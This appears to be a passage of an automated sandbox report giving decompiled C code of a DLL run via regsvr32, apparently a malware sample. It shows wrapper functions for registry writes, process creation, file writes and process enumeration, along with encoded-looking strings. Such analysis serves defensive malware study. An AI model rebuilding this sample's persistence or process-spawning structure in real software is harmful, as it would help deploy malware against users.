    • CreateToolhelp32Snapshot.KERNEL32(10003242,10003242,10003242,00000002,00000000,6322444752203058146B745952425B352C52436A), ref: 10001371
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E10001042() {
    				void* _t1;
    				void* _t2;
    
    				_t1 = HeapCreate(0, 0x1000, 0); // executed
    				 *0x10028080 = _t1; // executed
    				_t2 = E1000AEB0(); // executed
    				E1000AAFF(_t2);
    				E100091CE();
    				E10008040();
    				E1000AB28(4, 1, 8, 0x10019b64, 0x10028138);
    				 *0x100280e4 = 0x80000001;
    				 *0x10028094 = 0;
    				E10007008(0x10028088, " ");
    				E10007008(0x100280d4, ",");
    				E10007008(0x100280cc, L"4FC476AD");
    				E10007008(0x1002811c, L"E14E837B10701C329DB29FABF48C9DBE");
    				return E10007008(0x10028098, L"037200720E72737B00070E00007307747A70750478027873710D087209700406");
    			}





    0x10001051
    0x10001056
    0x1000105b
    0x10001060
    0x10001065
    0x1000106a
    0x10001088
    0x1000108d
    0x10001097
    0x100010ad
    0x100010be
    0x100010cf
    0x100010e0
    0x100010f6

    APIs
    • HeapCreate.KERNEL32(00000000,00001000,00000000,10001015), ref: 10001051
      • Part of subcall function 1000AEB0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,10001060,00000000,00001000,00000000,10001015), ref: 1000AEBC
      • Part of subcall function 1000AEB0: HeapAlloc.KERNEL32(008B0000,00000000,00004010,?,10001060,00000000,00001000,00000000,10001015), ref: 1000AEEA
      • Part of subcall function 10008040: HeapCreate.KERNELBASE(00000000,00001000,00000000,1000106F,00000000,00001000,00000000,10001015), ref: 10008049
      • Part of subcall function 1000AB28: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,1000108D,00000004,00000001,00000008,10019B64,10028138,00000000,00001000,00000000), ref: 1000AB58
      • Part of subcall function 1000AB28: memset.MSVCRT ref: 1000AB93
    Strings
    • 4FC476AD, xrefs: 100010C3
    • 037200720E72737B00070E00007307747A70750478027873710D087209700406, xrefs: 100010E5
    • E14E837B10701C329DB29FABF48C9DBE, xrefs: 100010D4
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 365 1000af60-1000af75 366 1000af93-1000afb2 HeapReAlloc 365->366 367 1000af77-1000af91 RtlAllocateHeap 365->367 368 1000afb4-1000afd9 call 1000b260 366->368 367->368
    C-Code - Quality: 100%
    			E1000AF60(void* __ecx, void** _a4, intOrPtr _a8) {
    				unsigned int _v8;
    				intOrPtr _t13;
    				void* _t16;
    				intOrPtr _t17;
    				intOrPtr _t20;
    				void* _t21;
    				void* _t22;
    				void* _t31;
    
    				_t13 =  *0x1002c3a4; // 0x0
    				_v8 = _t13 - _a8;
    				if( *_a4 != 0) {
    					_t31 =  *0x1002c5c0; // 0x8b0000
    					_t16 = HeapReAlloc(_t31, 0,  *_a4, _v8 + 0xa); // executed
    					 *_a4 = _t16;
    				} else {
    					_t21 =  *0x1002c5c0; // 0x8b0000
    					_t22 = RtlAllocateHeap(_t21, 0, _v8 + 0xa); // executed
    					 *_a4 = _t22;
    				}
    				_t17 =  *0x10027730; // 0x8b0930
    				E1000B260(_a4,  *_a4, _t17 + _a8, _v8 >> 1);
    				_t20 = _a8;
    				 *0x1002c3a4 = _t20;
    				return _t20;
    			}











    0x1000af64
    0x1000af6c
    0x1000af75
    0x1000afa2
    0x1000afa9
    0x1000afb2
    0x1000af77
    0x1000af80
    0x1000af86
    0x1000af8f
    0x1000af8f
    0x1000afba
    0x1000afc9
    0x1000afce
    0x1000afd1
    0x1000afd9

    APIs
    • RtlAllocateHeap.NTDLL(008B0000,00000000,?,?,?,1000504E,?,?,?,?,?,00000001,?,00000002), ref: 1000AF86
    • HeapReAlloc.KERNEL32(008B0000,00000000,00000001,?,?,?,1000504E,?,?,?,?,?,00000001,?,00000002), ref: 1000AFA9
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 371 1000aeb0-1000aef6 HeapCreate HeapAlloc
    C-Code - Quality: 100%
    			E1000AEB0() {
    				void* _t1;
    				long _t2;
    				void* _t3;
    				void* _t4;
    
    				_t1 = HeapCreate(0, 0x1000, 0); // executed
    				 *0x1002c5c0 = _t1;
    				 *0x1002c3a4 = 0;
    				 *0x1002c5c4 = 0x10;
    				_t2 =  *0x1002c5c4; // 0x4010
    				_t4 =  *0x1002c5c0; // 0x8b0000
    				_t3 = HeapAlloc(_t4, 0, _t2);
    				 *0x10027730 = _t3;
    				return _t3;
    			}







    0x1000aebc
    0x1000aec2
    0x1000aec7
    0x1000aed1
    0x1000aedb
    0x1000aee3
    0x1000aeea
    0x1000aef0
    0x1000aef6

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,10001060,00000000,00001000,00000000,10001015), ref: 1000AEBC
    • HeapAlloc.KERNEL32(008B0000,00000000,00004010,?,10001060,00000000,00001000,00000000,10001015), ref: 1000AEEA
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 372 1000b040-1000b048 373 1000b087-1000b08a 372->373 374 1000b04a-1000b082 wcslen HeapAlloc call 1000b260 372->374 374->373
    C-Code - Quality: 86%
    			E1000B040(void* __ecx, void** _a4, wchar_t* _a8) {
    				int _v8;
    				void* _t11;
    				void* _t14;
    				void* _t15;
    
    				_push(__ecx);
    				if(_a8 != 0) {
    					_v8 = wcslen(_a8);
    					_t6 = _v8 + 0xa; // 0x10004f34
    					_t14 =  *0x1002c5c0; // 0x8b0000
    					_t15 = HeapAlloc(_t14, 0, _v8 + _t6); // executed
    					 *_a4 = _t15;
    					return E1000B260(_a4,  *_a4, _a8, _v8);
    				}
    				return _t11;
    			}







    0x1000b043
    0x1000b048
    0x1000b056
    0x1000b05c
    0x1000b063
    0x1000b069
    0x1000b072
    0x00000000
    0x1000b082
    0x1000b08a

    APIs
    • wcslen.MSVCRT ref: 1000B04E
    • HeapAlloc.KERNEL32(008B0000,00000000,10004F34,10004F2A), ref: 1000B069
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 376 10004d18-10004d30 call 10007000 379 10004d61-10004d66 376->379 380 10004d32-10004d5d RegOpenKeyExW 376->380 381 10004d6a-10004d75 call 1000af30 379->381 380->381
    C-Code - Quality: 65%
    			E10004D18(void* _a4, intOrPtr _a8, int _a12, int _a16, void** _a20) {
    				long _v4;
    				intOrPtr _v8;
    				short* _v12;
    				intOrPtr _t13;
    				intOrPtr _t15;
    				void* _t19;
    
    				_push(0);
    				_push(0);
    				_push(0);
    				E10007000(_t19, _a8);
    				if( *0x100280a8 == 0) {
    					_t13 = 0xffffffff;
    				} else {
    					_t15 =  *0x100280a8;
    					_v8 = _t15;
    					_v4 = RegOpenKeyExW(_a4, _v12, _a12, _a16, _a20);
    					_t13 = _v4;
    				}
    				return E1000AF30(_t13, _v12);
    			}









    0x10004d1a
    0x10004d1b
    0x10004d1c
    0x10004d24
    0x10004d30
    0x10004d61
    0x10004d32
    0x10004d38
    0x10004d39
    0x10004d55
    0x10004d59
    0x10004d59
    0x10004d75

    APIs
    • RegOpenKeyExW.KERNEL32(?,?,?,?,?,00000000,00000000,1000306E,?,?,00000000,00000001,?,00000000,00000000,00000000), ref: 10004D51
      • Part of subcall function 1000AF30: HeapFree.KERNEL32(008B0000,00000000,00000000), ref: 1000AF48
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 384 10002fc9-10002fe0 call 10007000 387 10002fe2-10003009 RegQueryValueExW 384->387 388 1000300b 384->388 389 1000300d-10003018 call 1000af30 387->389 388->389
    C-Code - Quality: 72%
    			E10002FC9(void* _a4, intOrPtr _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
    				intOrPtr _v4;
    				short* _v8;
    				long _t12;
    				intOrPtr _t14;
    				void* _t17;
    
    				_push(0);
    				_push(0);
    				E10007000(_t17, _a8);
    				if( *0x100280c8 == 0) {
    					_t12 = 0;
    				} else {
    					_t14 =  *0x100280c8;
    					_v4 = _t14;
    					_t12 = RegQueryValueExW(_a4, _v8, _a12, _a16, _a20, _a24);
    				}
    				return E1000AF30(_t12, _v8);
    			}








    0x10002fcb
    0x10002fcc
    0x10002fd4
    0x10002fe0
    0x1000300b
    0x10002fe2
    0x10002fe8
    0x10002fe9
    0x10003005
    0x10003005
    0x10003018

    APIs
    • RegQueryValueExW.KERNEL32(?,?,?,?,?,?,00000000,100030A2,?,?,00000000,00000000,00000000,00000000,?,?), ref: 10003005
      • Part of subcall function 1000AF30: HeapFree.KERNEL32(008B0000,00000000,00000000), ref: 1000AF48
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 392 10001a1d-10001a27 393 10001a61 392->393 394 10001a29-10001a5f CreateProcessW 392->394 395 10001a63-10001a66 393->395 394->395
    C-Code - Quality: 64%
    			E10001A1D(WCHAR* _a4, WCHAR* _a8, struct _SECURITY_ATTRIBUTES* _a12, struct _SECURITY_ATTRIBUTES* _a16, int _a20, long _a24, void* _a28, WCHAR* _a32, struct _STARTUPINFOW* _a36, struct _PROCESS_INFORMATION* _a40) {
    				char _v4;
    				int _t13;
    
    				_push(0);
    				if( *0x100280a0 == 0) {
    					_t13 = 0;
    				} else {
    					_push( *0x100280a0);
    					_v4 = 0;
    					_t13 = CreateProcessW(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
    				}
    				return _t13;
    			}





    0x10001a1f
    0x10001a27
    0x10001a61
    0x10001a29
    0x10001a29
    0x10001a30
    0x10001a5b
    0x10001a5b
    0x10001a66

    APIs
    • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?,10002D5E,00000000,?,?,00000000,00000000), ref: 10001A5B
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 396 10003353-1000335d 397 10003393 396->397 398 1000335f-10003391 RegCreateKeyExW 396->398 399 10003395-10003398 397->399 398->399
    C-Code - Quality: 64%
    			E10003353(void* _a4, short* _a8, int _a12, short* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
    				char _v4;
    				long _t12;
    
    				_push(0);
    				if( *0x10028124 == 0) {
    					_t12 = 0;
    				} else {
    					_push( *0x10028124);
    					_v4 = 0;
    					_t12 = RegCreateKeyExW(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
    				}
    				return _t12;
    			}





    0x10003355
    0x1000335d
    0x10003393
    0x1000335f
    0x1000335f
    0x10003366
    0x1000338d
    0x1000338d
    0x10003398

    APIs
    • RegCreateKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,100013D8,?,?,00000000,00000000,00000000,00000004), ref: 1000338D
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 400 100026a4-100026ae 401 100026b0-100026da CreateFileW 400->401 402 100026dc 400->402 403 100026de-100026e1 401->403 402->403
    C-Code - Quality: 64%
    			E100026A4(WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
    				char _v4;
    				void* _t10;
    
    				_push(0);
    				if( *0x100280ac == 0) {
    					_t10 = 0;
    				} else {
    					_push( *0x100280ac);
    					_v4 = 0;
    					_t10 = CreateFileW(_a4, _a8, _a12, _a16, _a20, _a24, _a28);
    				}
    				return _t10;
    			}





    0x100026a6
    0x100026ae
    0x100026dc
    0x100026b0
    0x100026b0
    0x100026b7
    0x100026d6
    0x100026d6
    0x100026e1

    APIs
    • CreateFileW.KERNEL32(00000006,00000006,00000006,00000006,00000006,00000006,00000006,1000154D,00000018,00000002,00000000,00000000,00000002,00000080,00000000,?), ref: 100026D6
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 404 100032e6-100032f1 405 100032f3-10003319 RegSetValueExW 404->405 406 1000331b 404->406 407 1000331d-10003320 405->407 406->407
    C-Code - Quality: 53%
    			E100032E6(void* _a4, short* _a8, int _a12, int _a16, char* _a20, int _a24) {
    				char _v8;
    				long _t9;
    
    				_push(0);
    				_push(0);
    				if( *0x100280c4 == 0) {
    					_t9 = 0;
    				} else {
    					_push( *0x100280c4);
    					_v8 = 0;
    					_t9 = RegSetValueExW(_a4, _a8, _a12, _a16, _a20, _a24);
    				}
    				return _t9;
    			}





    0x100032e8
    0x100032e9
    0x100032f1
    0x1000331b
    0x100032f3
    0x100032f3
    0x100032fa
    0x10003315
    0x10003315
    0x10003320

    APIs
    • RegSetValueExW.KERNEL32(?,?,?,?,?,?,00000000,10002E0E,?,?,00000000,00000001,?,-00000002,?,?), ref: 10003315
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 408 10002f06-10002f10 409 10002f12-10002f34 WriteFile 408->409 410 10002f36 408->410 411 10002f38-10002f3b 409->411 410->411
    C-Code - Quality: 64%
    			E10002F06(void* _a4, void* _a8, long _a12, DWORD* _a16, struct _OVERLAPPED* _a20) {
    				char _v4;
    				int _t8;
    
    				_push(0);
    				if( *0x100280f0 == 0) {
    					_t8 = 0;
    				} else {
    					_push( *0x100280f0);
    					_v4 = 0;
    					_t8 = WriteFile(_a4, _a8, _a12, _a16, _a20);
    				}
    				return _t8;
    			}





    0x10002f08
    0x10002f10
    0x10002f36
    0x10002f12
    0x10002f12
    0x10002f19
    0x10002f30
    0x10002f30
    0x10002f3b

    APIs
    • WriteFile.KERNEL32(?,?,?,?,?,10001575,00000004,?,?,00000000,00000000,00000018,00000002,00000000,00000000,00000002), ref: 10002F30
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 416 10003a20-10003a2a 417 10003a44 416->417 418 10003a2c-10003a42 Process32NextW 416->418 419 10003a46-10003a49 417->419 418->419
    C-Code - Quality: 64%
    			E10003A20(void* _a4, struct tagPROCESSENTRY32W _a8) {
    				char _v4;
    				int _t5;
    
    				_push(0);
    				if( *0x100280d8 == 0) {
    					_t5 = 0;
    				} else {
    					_push( *0x100280d8);
    					_v4 = 0;
    					_t5 = Process32NextW(_a4, _a8);
    				}
    				return _t5;
    			}





    0x10003a22
    0x10003a2a
    0x10003a44
    0x10003a2c
    0x10003a2c
    0x10003a33
    0x10003a3e
    0x10003a3e
    0x10003a49

    APIs
    • Process32NextW.KERNEL32(?,?,10003266,00000002,?,00000002), ref: 10003A3E
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 420 10008060-10008066 421 10008068-10008077 RtlAllocateHeap 420->421 422 1000807a-1000807c 420->422
    C-Code - Quality: 100%
    			E10008060(long _a4) {
    				long _t2;
    				void* _t4;
    
    				_t2 = _a4;
    				if(_t2 <= 0) {
    					return 0;
    				} else {
    					_t4 = RtlAllocateHeap( *0x1002c538, 8, _t2); // executed
    					return _t4;
    				}
    			}





    0x10008060
    0x10008066
    0x1000807c
    0x10008068
    0x10008071
    0x10008077
    0x10008077

    APIs
    • RtlAllocateHeap.NTDLL(00000008,00000104,100054E4,00000104,00000000,00000000,00000000,100030F8,00000000,00000000,10004E9A,10000000,10003979), ref: 10008071
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E10008040() {
    				void* _t1;
    
    				_t1 = HeapCreate(0, 0x1000, 0); // executed
    				 *0x1002c538 = _t1;
    				return _t1;
    			}




    0x10008049
    0x1000804f
    0x10008054

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,1000106F,00000000,00001000,00000000,10001015), ref: 10008049
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E1000B180(signed int _a4, intOrPtr _a8) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _t15;
    				void* _t19;
    				void* _t20;
    				intOrPtr _t21;
    				void* _t25;
    				void* _t27;
    				intOrPtr _t30;
    
    				_t21 =  *0x1002c3a4; // 0x0
    				_v8 = _t21 + _a4 * 2;
    				_t15 =  *0x1002c5c4; // 0x4010
    				if(_v8 >= _t15 - 4) {
    					 *0x1002c5c4 = _v8 + 0x4000;
    					_t30 =  *0x1002c5c4; // 0x4010
    					_t19 =  *0x10027730; // 0x8b0930
    					_t25 =  *0x1002c5c0; // 0x8b0000
    					_t20 = HeapReAlloc(_t25, 0, _t19, _t30 + 0xa); // executed
    					 *0x10027730 = _t20;
    				}
    				_t27 =  *0x10027730; // 0x8b0930
    				_v12 = _t27 + _a8;
    				 *0x1002c3a4 = _a8 + _a4 * 2;
    				return _v12;
    			}












    0x1000b189
    0x1000b192
    0x1000b195
    0x1000b1a0
    0x1000b1ab
    0x1000b1b1
    0x1000b1bb
    0x1000b1c3
    0x1000b1ca
    0x1000b1d0
    0x1000b1d0
    0x1000b1d5
    0x1000b1de
    0x1000b1ea
    0x1000b1f6

    APIs
    • HeapReAlloc.KERNEL32(008B0000,00000000,008B0930,00004006,?,00000000), ref: 1000B1CA
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E1000AFE0(wchar_t* _a4) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _t9;
    				short* _t10;
    				intOrPtr _t13;
    				intOrPtr _t17;
    
    				if(_a4 == 0) {
    					_t9 =  *0x10027730; // 0x8b0930
    					_t10 = _t9 +  *0x1002c3a4;
    					 *_t10 = 0;
    					return _t10;
    				}
    				_v8 = wcslen(_a4);
    				_t17 =  *0x1002c3a4; // 0x0
    				_t13 = E1000B180(_v8, _t17); // executed
    				_v12 = _t13;
    				return E1000B260(_a4, _v12, _a4, _v8);
    			}









    0x1000afea
    0x1000b021
    0x1000b026
    0x1000b02e
    0x00000000
    0x1000b02e
    0x1000aff8
    0x1000affb
    0x1000b006
    0x1000b00b
    0x00000000

    APIs
    • wcslen.MSVCRT ref: 1000AFF0
      • Part of subcall function 1000B180: HeapReAlloc.KERNEL32(008B0000,00000000,008B0930,00004006,?,00000000), ref: 1000B1CA
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E1000AF30(void* __eax, void* _a4) {
    				int _t5;
    				void* _t6;
    
    				if(_a4 != 0) {
    					_t6 =  *0x1002c5c0; // 0x8b0000
    					_t5 = HeapFree(_t6, 0, _a4); // executed
    					return _t5;
    				}
    				return __eax;
    			}





    0x1000af39
    0x1000af41
    0x1000af48
    0x00000000
    0x1000af48
    0x1000af51

    APIs
    • HeapFree.KERNEL32(008B0000,00000000,00000000), ref: 1000AF48
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
